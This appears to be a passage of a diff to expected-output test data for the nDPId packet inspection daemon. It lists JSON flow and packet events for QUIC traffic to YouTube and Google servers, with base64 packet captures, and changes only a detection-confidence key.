ApitcdFflHseTh619fCFNKL2L1AUL6shWE6hYP4JwBlMizT032t\/G3ASg\/GZ6BQlaObPebtYEVaZCai90TwmlfCeA\/AIXdD8iJXn7qA5z4o9cudnvk3agR7adxxofVPe6U4OcOJSG1IX2\/mU9S3WYmdFWlpmlMVHWT3QNthK23pRqiZHtH51vPjMDpY3FqBdaqTN8m\/Dc4voSrhGa0IJlpuTviRXm7EgxB8GHN9HytCvDZuPXhu91noUZcgCIcGTZdSBm7cO\/YoHlfVoH\/mVp5MrHSi9cVczjkioTHtPkpy1ub78xuF91\/7S4rXYep6NGOoGjl23AjOJfTTGhu5OWPnU9zMLFkllrVtCulEqT+b5PFzw2wjUYTJTfyrFiv4F8XdsoNLNTmtUCFVtsmWcabX5L6p42ndagG\/+lMde5hAmST6j3vklTteqoWcqrEZNH4LzFgOyupl0Nl63YsGt1OzfxU+904VhWQPq2NIdlO+VtI2U06A2jgU4WwWPcULGssz3QtHxG+LwUiedg0QSFGFQKA+HA3HUYnUTTYIQEOfSJx3BxpSEIE+zqBA8OZ8JL2GHKmdK1yQ+QhbvZXA4BPgaafeG++Hlfj9oqrT+ZkIG2l0Yfi89xALYyMS\/gQtfGRo\/IadU5q3tpHQLFWpdkHZ9FwndqSUrS1W8KKMO\/Y8VATyOpS4PEVwTvTNX4MptJ5NujWqz1tWdiz33An49EYTOXVJvPTodQHJ6ScBKXD30TZbFd4JFzqTcxJu3nOEA6eQblNYy03SZE\/gq\/uktoCqfQIdHNw9SpoHHvaxzhTg4ZR09H6m1QeCHM3dx7ZS5pYsDTexlRcFXpzoNicNl8Q\/2OtYWMZ4zF6\/CjcDuQvPr2BUhrvbmwgeP6jRdw+XwQt+56ZJnLJ7rqhWgtjWk0w4rXPG9gc7C9mf1jPCpHdhiaiIHYCW1Wd3j1GtKfhCdyiCFOIWtzH0tcNMR8zIv9wbPxww9aLwCYz5XkiX9tknrGgSCPyQiiND9wb6jafpQD1hvkRwJxkCJOZU8vAuWEsMD6iwR4yDvCNedmLBMJI9iw\/9hqHHhyJIDnBp6H8oKWPSKifJafbNfTF1Fz7AvqO\/tFzsGlI2GW4QCJCL+P0gz9lGiqCDzlVP7LUu3jgRkwKna8"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 
10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1621432440134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432440134,"pkt":"AAAAAAAAAAEA737VCABFAAViBAZAAH4RSf6okEAFI8KdL+8ZAbsFTr\/Xzf8AAB0IcdVU301Wze0AAEU0qL3NNLtf2+b\/2Q4JDmzOHuurx9ulrjBLe9GvWGRZXR74WuLmvtIcsJsXXu\/onEdRmT3qTKLOfB7QlcM+PdfoCZmAYmwmyLMzO1HiyG7sIAFes4PP7T6NAXfX4dDWOMvuIoqSmNkVfgauiC5HOyWMHbTwhfwIk9FH1THd9hg6M7nbFuqZXTlC9q\/HwWaVt0bqSTrO3Bj08fiQQfXQGebdpALH6GbV3Jk1dtdbibh6Q37TxrzVgVH5kTFgrwemEnm6q0JQ4Dhq3cX19c8TR3nc50xv+02sA747DQ\/Og4Dz3zoy3+9lfKFqG4wBWdi7z9Rtbn6YwB0LntW5ts12RB+1xYF3UXtpz2seNJelWMZlW1Yh2Fg7mxZYCV0mhQ+xkW1jz6uQcCXMvY5VUbBhvI7zPyZXMY225B2xtuayBXFLLNWzpbQeAEm4XEG4jck8JjKcdxDGQ+tGA6NImdCpMo5KmFlcOnxo4uqBnZ9OZkKuYmAiB3GuA2sRbfaBNzP8vQwIFvmHb\/Rj2f71WSeQKgdmQsaAhoH\/i\/3l5iENNXW6JY9oLoSzWpFhhMlhMjBZ3S1j79TiuS1cWWOOgbGTSXawjyS+IJUIEba2UWRmGIBGjXz7YQQM8xrQS3DbYPJpoisNf04U9mZ54mIM7d+qCQg6VvUNSPRVsV2ux9+PC4W+DFbNy7ALH9ybKA9vKWlQUpcbaW+jQsoJM\/SQ5b4QpyLutRi\/+03sArWhuCnGvdy7QAw+lqj4m6TazHFMsw8w9T2dXVSYXvMNZZ+lLEZlQPpZjmx9uVHste\/wK0vx2c2TjY1hHMzZ4AGwz0ms2kd6XzNS\/wvUOYDcKfIokyYtfAUWmCQI168\/+BuG8b18LWykPNLhWdChPdxlY1M+5SYzdwPjjveFCHw1L31UvQ6QTs8T38YN3DeGrsHTEy1s0ONT1u8feiEDnAPamO5WxHIjVwTMaqbM76RuQbnmjfhNHd0QoBM2fFReITNAsjH5kJa7i1TauIG0LaQZDpRVw3ICDfio58fJIl35v5PBMp8xp6YEUh6d3p9ScDuUo02IpwHd1HAlLwRGLR3NEtr5XuCivraDkSulNk3LUOQdi4J3hNX6NixF3PLCKpvKYYBlI5Sbhl1LhL8Zjl9RJmBTxo3afoYRddxBMufMU3TDfOy2JAEIIvU6KLGYmcpbsBtJwsXg0+562385q64u2sTt2RWiXKEd9XAbOSkl8zz\/mhucCFcCxP\/aDXgf0nhuQpFELBEZxhmx10a3fl8WGlup7xBSgxvAoyjKgZwDinUQRGlQ4Y2+tHaNOUbjWKe1wgznCkTVbj4wkKMm7RKCqDexOds6oHYJPSEl2ioqJqXv85s9\/qmLyp\/s1AI8M7Mm8FUs7EDf5f1L5asrjpQuWtQiUN0J6w4SwozYuqkLkch\/ICUylDPff4K1jxbiN1VWrycEsZdK5WpULn5nsb9oIRivBTIrKfF2Vf
spz\/ToLSA8OMT+vsu\/+HK6nVkqTjzbRqT+pMnx2Bg8V55cqGRM016Z6gjflmJ1aHj+\/7PWGoGPR1OQLMY\/Bbvy6c2Rry2q\/F6g8U6A11H66ntA51Q1W18sSC19Oo78tRgloQAn3NhfHhRfesZlY7E7I6PWaLKJ9bgiKoE4IEvCn6psctBWJXQo2AFp11lONrIQS2Q5YaGNNVXxi5Dw01RN1HiS0lRdioVe9QcDCTMQZDSAB5lZNujG+Ir7VUx07m5euHIfgcaR55adpIzCIXUpqTuVCHNV24cdDCtFs\/WXmPsU"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": 
{"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1621432489421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432489421,"pkt":"AAAAAAAAAAEASF70CABFAAVi8YJAAH4RfUeokEAFYy08\/sVsAbsFTr7Cyf8AAB0IKamQAwU5OroANwARJweyyh8ASQgxaSFNO9MfXImTMnwyXomKh\/ZNPfedDyh5KvfO1MGG51HqkCogC6AtPwJhXTpE\/UKpou6VqZCesbSiBTNDA1JFBQs9B6lpbtkYSC+McmmSMojjEgtxhDYt8\/9dtYYlDOPFZ\/dpG+QdFbgpLb4LL6Kabs8KYDLn+VqI2E8m8ueQOkn1lBiQoAvc0rNjKOazmVq5mZXSMd1VKlKpsbLOchPYIZxqylhHTDiE7M3pNLaBVo\/olK9W8Zr8w5fFNyksOM0htXk+QusGKuzXzx2XRWu+\/Nk8r7wn26b5E2vnI6CqmRqlOx9Hbk9Oav798TUdoZ0ik2Pol9Xb+eCHQNw+XlJCy\/TQAtSNksS7kjeCCjcbIt41ZBla1c58qm1+q0++oj5c2fe6RrhPybaYLt8YUpSsMhpGJI\/Ql2\/NmxHBJxo5URbPjWXLfEGzOcpmsNmVJ2O9aDrYcnv7WnX5CqvzA823haQIF1GHG7\/MkUogQZRdTEAvJm6fBF5zdqrS2BtCxd2wUWnXyoJY3aKCgXRQrdDpBCgpGApMxKuJB5qoWXrZh8eHqiyYIyjBNfvtQacRj6kQMCYITp5tTIecrcXoKPo
cWiez2LDcj\/S\/19jMLvrNbAcBhQ6KfoiiIJJOb3DnfTdQP6\/4DMSpIjO+s3jvnlF0btkDi2\/ISfy4kfHVix828TssUSRGKO7KC0GwgS6FJsjlz0BU+vv1QZznASY0gmrqU3L3V5EQeJ0JuFK8HKRd4Fj+EOeYQx60REWybndyHIisn1HhzWoZcpBZwH8Nx3rK3uqBbQKlKJmY1TKEse7UpeUToZQDC4fP0SVbtXlKRmkq+uL6gS0GXdLk+VwSXcDDT+JTBTAhOp\/PT0efB56Sw+xnoUoFO+26Osuir43c64mxBrmnuAVQrEG026YUbEpAkKETMHo85xB4Z7xRvocdlOwY06zlP9\/rFbbBE+M+FpELJaF1wOHE282\/6ko8\/0bJJFV2afTCYTIRatNwPLUVY54dJGaDmplh02DhsFSye4H1RytUERPkjLbau4RtBnyf8NekTGeSkfPd29dQ+7m1VARylC5UF8rsK9PxqZ1IjkctsYgU+YvVSm5sX2FqZmQnWn7sx+TmogpnRijHnt3gAx8MpZ1\/6vPZ0mXemrF1srit9ZhT9S1OtARcQG2mrpiCj3+wcDBjy8OxZdjDuPm+7HYnGMUpqQkUp5WDI0HR2Th8J5PiquceXUIN4UYAUOeV6+xy586aR9Bisr9aBs9XUgGeWalZKu0RJLjU\/r6J6yoYwl+tg\/Zh3vVSM24611GhQaadM3op866bGdU4YLBybgRc3Gl0QGq2gCLhejcidoxs5tD3NjeK89xtwPQd7irCBamj04rGwldvYQzxbOjeA5oAoJSaadBElduSTxGYH3oVrfOgrS2xGZtBSStJG7d09ikIYBkxSUYLU27iwQJherSUvhZ85af0XhrTHEYu6GB2FjNOq+mksDa8mM8rpcJgx+hehI17xz+xkqLWilCXGjnoMZWTF4Tx8xav902wfX8qjTHhu5vIsQ\/UV+gR7AYOV0tnC8Ul0PnHl3PUWikjISrIX+vX8LECvnHa+4b7xSouGskcMlecPWND4hCVtRZvNm9FxXgWi2wjpcIcPfODR+Arhmv3RE8GE8lOzxw8rv2AGdqFNX5JwaFFXigZ3vX4WrSH2bNvsDcj\/5We1g3jrVPhkwMz5PcaJQDojUW2GfWTFK1W+lQcDVZR4jO2eOnoR1WqEqE7OlWlEJxz"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; 
x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":43,"packets-processed":42,"total-skipped-flows":0,"total-l4-payload-len":56700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":31,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1621432545371} 
00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1621432545371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432545371,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYPlAAH4R+r6okEAFCUGp\/O2JAbsFTlWIxP8AAB0IC3jlg9iBHxIANwCHrPC\/4ONhhPa4\/bkucOa0ccMbRx\/dWQUxDvvPbBbSBV+QAXzHkO\/ek8WDdft4J2H6iGctCUVE\/Vd1az8ukuRtgZHkNe9HsjHNPcO9gC3hoF0jI1WUFpr6W\/bvPAMD0ojxS\/Jat1yERFCwK1qTZjHTu5Hq2GxnTFLRrBvKpajRH4mp0PBh9N1EEyOXmqHY8RR8CFuGBAVrGssOFJJLCgoPFYWi4kU+3Er5AjbG6hAThXTq5QSrnvRF2NsfVwKcZH64AJtDNhF1vVsm5Y8FPRr0Bw0OMhHo5TfDD9554NzZqybC30Lzg75oLfpGADza1+jH3enNvlyD\/9OdXxVtLFBPpK+tc1S0j2l24nUXrhfgzMYJSGfusfan3MputzKVw0xaEMSTFnMyVXBwvQvsJpXe\/cfXTGaPcz+n+4PtyXFFeq1VFMb38KcaBIZAXpjtbjsKy1u0drs8\/lS6zg0B+XEXyyVbBHNPSwQzvYAFgbxG5T2f7cZpDXxonb7KKJeiTREIg53VKn6taxqerf\/EROOn+QPkvNTMzD2dTm5TFHSYxLvBV5+O6FgwNIPd9zSQjxu\/PIgbyOa5d1rycolz3RRmObJ7xDqSBQEx9uBtKS475iYE3\/HVHr98HbKghpyBXtrfiFCJfUPvGhf2ZQTE\/2PgBc4nFIolPbu5IHP5jlx9YJheTrRtsN8xZyNylrQiJyWGIJ+sqW7NQD4PtZU8og15AsUXrhsGP3nifKZ2RW8ULO\/zQ4hjXLbXvVPCRMaOfTnRWz16ymzmazGc\/A9WtT81r16LRVyV3KW5BVcHMerZjTINdFBiN2Rss9YE+hg2Bdzx0FHiLD2S
